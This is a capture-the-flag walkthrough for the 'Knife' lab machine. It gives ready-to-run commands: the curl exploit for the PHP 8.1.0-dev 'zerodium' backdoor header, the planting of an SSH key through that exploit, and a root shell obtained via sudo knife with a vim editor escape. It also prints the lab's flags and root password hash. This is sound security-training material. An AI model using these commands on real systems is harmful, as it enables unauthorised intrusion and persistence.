NameCap
DifficultyEasy
Release Date2021-05-22
Retired Date<don’t know>
IP Address10.10.10.242
OSLinux
Points20

The WalkThrough is protected with the root user’s password hash for as long as the box is active. For any doubt on what to insert here check my How to Unlock WalkThroughs.

foothold

For our initial foothold we’re gonna start with nmap and then go on from there.

$ nmap -p- -A knife.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-30 21:47 WEST
Nmap scan report for knife.htb (10.10.10.242)
Host is up (0.055s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.09 seconds

Not much running on this box. Let’s check out the website.

website

Not much to see here. No links, no hidden code on the page source, nothing, not even a little hint on what the site may be based on. Let’s just fire gobuster and look for some hidden paths.

$ gobuster dir -u http://10.10.10.242 -w /usr/share/dirb/big.txt -x .php,.html,.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.242
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt
[+] Timeout:        10s
===============================================================
2021/05/31 10:54:04 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.html (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess.txt (Status: 403)
/index.php (Status: 200)
/server-status (Status: 403)
===============================================================
2021/05/31 10:59:52 Finished
===============================================================

Wait, nothing in here too πŸ€”?! This is getting weird by the minute. So, it is running php. Let’s try to get all the versions from the software stack and search for some vulnerabilities.

From the nmap result we get this two versions:

  • ssh: OpenSSH 8.2p1
  • apache: Apache httpd 2.4.41

But out of curiosity, let’s find the php version too:

$ curl -v 10.10.10.242 -s | grep -i php
*   Trying 10.10.10.242:80...
* Connected to 10.10.10.242 (10.10.10.242) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.242
> User-Agent: curl/7.76.1
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 31 May 2021 10:17:20 GMT
< Server: Apache/2.4.41 (Ubuntu)
< X-Powered-By: PHP/8.1.0-dev
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
< 
{ [3827 bytes data]
* Connection #0 to host 10.10.10.242 left intact

PHP 8.1.0-dev it is. Now wait a minute! A -dev version running on a server? Let me just google that for a second.

google-php

Ok, that explains it πŸ˜„. After checking what vulnerability it was, I remembered reading it on the news. Busically, some PHP dev’s accounts were compromised and 2 commits were made to PHP’s git repo that added a backdoor to the code. Basically, there was a special HTTP header called user-agentt (notice the double t), and if that header was defined and the contents started with “zerodium”, everything else was PHP evaled, meaning, easy remote code execution.

This can be easily exploited with a simple curl command:

$ curl 10.10.10.242 -s -H "user-agentt: zerodiumsystem('whoami');" | sed "/<\!DOCTYPE html>/q"
james
<!DOCTYPE html>

There we go, as I said, easy code execution. Let’s just add our ssh public key to the authorized_keys file of the user james so we get our foothold.

$ curl 10.10.10.242 -s -H "user-agentt: zerodiumsystem('echo ssh-ed25519 <TRIMMED_OUT> r3pek >> /home/james/.ssh/authorized_keys');" | sed "/<\!DOCTYPE html>/q"
<!DOCTYPE html>

$ ssh james@10.10.10.242
The authenticity of host '10.10.10.242 (10.10.10.242)' can't be established.
ED25519 key fingerprint is SHA256:U3tuGrGxSv//jAzSQDRiUNlQnE6LWwounrcc2Bd0qC4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.242' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-72-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 31 May 2021 10:36:11 AM UTC

  System load:             0.11
  Usage of /:              50.2% of 9.72GB
  Memory usage:            66%
  Swap usage:              0%
  Processes:               343
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.242
  IPv6 address for ens160: dead:beef::250:56ff:feb9:1320


18 updates can be applied immediately.
13 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

james@knife:~$

And there we have it, our foothold.

user flag

james is such a nice guy that he ran the webserver for us, so luckily getting the user flag is just a matter of reading the user.txt file πŸ˜‡

james@knife:~$ cat user.txt 
c5d00ebe8c38644b681ca090057d67ca

root flag

For the root flag we’re gonna start with checking which commands we can run as root:

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

Ok, we can run knife (I didn’t know what it was, but googling it turns out it’s a Chef management tool).

This tool has lots of options but one of its parameters caught my eye:

james@knife:~$ knife -h
Chef Infra Client: 16.10.8

Docs: https://docs.chef.io/workstation/knife/
Patents: https://www.chef.io/patents

Usage: knife sub-command (options)
    -s, --server-url URL             Chef Infra Server URL.
        --chef-zero-host HOST        Host to start Chef Infra Zero on.
        --chef-zero-port PORT        Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
    -k, --key KEY                    Chef Infra Server API client key.
        --[no-]color                 Use colored output, defaults to enabled.
    -c, --config CONFIG              The configuration file to use.
        --config-option OPTION=VALUE Override a single configuration option.
        --defaults                   Accept default values for all questions.
    -d, --disable-editing            Do not open EDITOR, just accept the data as is.
    -e, --editor EDITOR              Set the editor to use for interactive commands.
    -E, --environment ENVIRONMENT    Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
        --[no-]fips                  Enable FIPS mode.
    -F, --format FORMAT              Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
        --[no-]listen                Whether a local mode (-z) server binds to a port.
    -z, --local-mode                 Point knife commands at local repository instead of Chef Infra Server.
    -u, --user USER                  Chef Infra Server API client username.
        --print-after                Show the data after a destructive operation.
        --profile PROFILE            The credentials profile to select.
    -V, --verbose                    More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
    -v, --version                    Show Chef Infra Client version.
    -y, --yes                        Say yes to all prompts for confirmation.
    -h, --help                       Show this help message.

It has an --editor parameter to specify what editor you want to use when editing some files. Immediately I knew what to do, just had to find a command that opened up the editor, which in my case is going be vim, and use vim’s “run command” (:!<command>) to run a shell as root.

After trying a few commands that should pop up an editor (I never used Chef, so I’m kind of walking blind here), I found one that works:

james@knife:~$ sudo knife user edit support --editor=vim

vim pops up so we can edit the support user, and that’s where we execute our “magic” πŸ˜‰. Just typing :!bash opens up a root shell:

root@knife:/home/james# id
uid=0(root) gid=0(root) groups=0(root)
root@knife:/home/james# cd
root@knife:~# cat root.txt 
effb0de0072f99457437560b9af83025
root@knife:~#

Mission accomplished πŸ’ͺ!


root password hash

$6$LCKz7Uz/FuWPPJ6o$LaOquetpLJIhOzr7YwJzFPX4NdDDHokHtUz.k4S1.CY7D/ECYVfP4Q5eS43/PMtsOa5up1ThgjB3.xUZsHyHA1